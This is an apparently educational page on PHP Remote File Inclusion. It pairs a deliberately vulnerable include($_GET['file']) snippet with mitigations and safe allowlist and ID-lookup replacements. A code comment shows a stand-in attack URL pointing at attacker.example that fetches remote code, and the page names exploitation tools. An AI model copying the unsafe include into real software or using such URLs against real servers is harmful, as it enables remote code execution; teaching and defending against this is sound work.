Remote File Inclusion (RFI)


We have seen that LFI (Local File Inclusion) and RFI (Remote File Inclusion) are very similar; the only difference is that with RFI the included file is fetched from a remote server chosen by the attacker.

RFI is more critical than LFI, because the attacker does not first need to get a file onto the target: the code is served straight from the attacker's own server.

For example, consider a page that includes a file named by a query parameter. On the server this is implemented in PHP as:

$file = $_GET['file'];   // taken straight from the request, never validated
include($file);          // includes, and therefore executes, whatever was supplied

This is an unsafe implementation because the user's input is not validated before it reaches include().

An attacker can therefore supply a URL instead of a local file name; PHP fetches the remote file and executes it on the server (this requires remote inclusion to be enabled in the PHP configuration; with it disabled the same code is still vulnerable to LFI).


Impact:

  • Remote code execution (RCE): the attacker's code runs with the privileges of the web-server user.
  • If the web-server user is privileged, the whole server is compromised.


Mitigation:

  • If you do not need to include files from a remote server, disable remote inclusion in the server configuration.
    • In PHP this is the allow_url_include directive in php.ini. It is Off by default (and deprecated since PHP 7.4), so check that nobody has turned it On. Note that allow_url_fopen, which is On by default, does not by itself allow include() of a URL.
  • Never trust user input: validate it before passing it to include() or any other file function.
  • Instead of putting a file path in the URL, store the paths in a database (or a server-side map), assign each a numeric ID, and use only the ID in the URL.
  • Prefer an allowlist of the exact files you want to be includable.
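The following is an added example written for this page, not code from the original article: it places the unsafe include shown above beside two safe replacements that implement the mitigations listed here (an allowlist of names, and a numeric ID mapped to a path on the server). The directory ./pages/, the page names and the ID table are assumptions made for the illustration.

```php
<?php
// Added example, not code from the original page: the unsafe include from above
// beside two safe replacements. ./pages/, the page names and the ID table are
// assumptions made for this illustration.

// --- UNSAFE: the pattern described on this page (shown for contrast, never call it)
function include_unsafe(): void
{
    $file = $_GET['file'];   // attacker-controlled, never validated
    include($file);          // with allow_url_include=On, ?file=http://attacker.example/x.txt
                             // fetches and runs attacker code; with it Off this is still LFI
}

// --- SAFE 1: allowlist of exact names ------------------------------------------
// Only the hard-coded names are accepted; the request never supplies a path or URL.
const ALLOWED_PAGES = ['home', 'about', 'contact'];   // assumed page names

function include_allowlisted(string $name): void
{
    if (!in_array($name, ALLOWED_PAGES, true)) {   // strict comparison, no type juggling
        http_response_code(404);
        exit('Not found');
    }
    include __DIR__ . '/pages/' . $name . '.php';
}

// --- SAFE 2: numeric ID mapped to a path on the server -------------------------
// The URL carries ?page=2; the ID-to-file table lives only on the server.
const PAGE_BY_ID = [1 => 'home.php', 2 => 'about.php', 3 => 'contact.php'];   // assumed

function include_by_id(string $rawId): void
{
    // FILTER_VALIDATE_INT rejects "http://...", "2/../../etc/passwd", "2abc" and "".
    $id = filter_var($rawId, FILTER_VALIDATE_INT);
    if ($id === false || !isset(PAGE_BY_ID[$id])) {
        http_response_code(404);
        exit('Not found');
    }
    include __DIR__ . '/pages/' . PAGE_BY_ID[$id];
}

// Defence in depth: allow_url_include is PHP_INI_SYSTEM, so it cannot be changed
// here with ini_set(); the best a script can do is detect that it is On and log it.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('allow_url_include is On; turn it Off in php.ini');
}

include_by_id($_GET['page'] ?? '1');
```

Both safe variants reject URLs and traversal strings without any blacklist, because the value from the request is never used as a path: it is only compared against, or used to look up, data the server already holds. The allow_url_include directive itself must be set in php.ini (or the web server's PHP configuration); code cannot turn it off at runtime.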


Tools:

  • fimap: finds, audits and exploits local and remote file inclusion bugs in web applications.
  • CrabStick: automatic remote/local file inclusion vulnerability analysis and exploitation tool.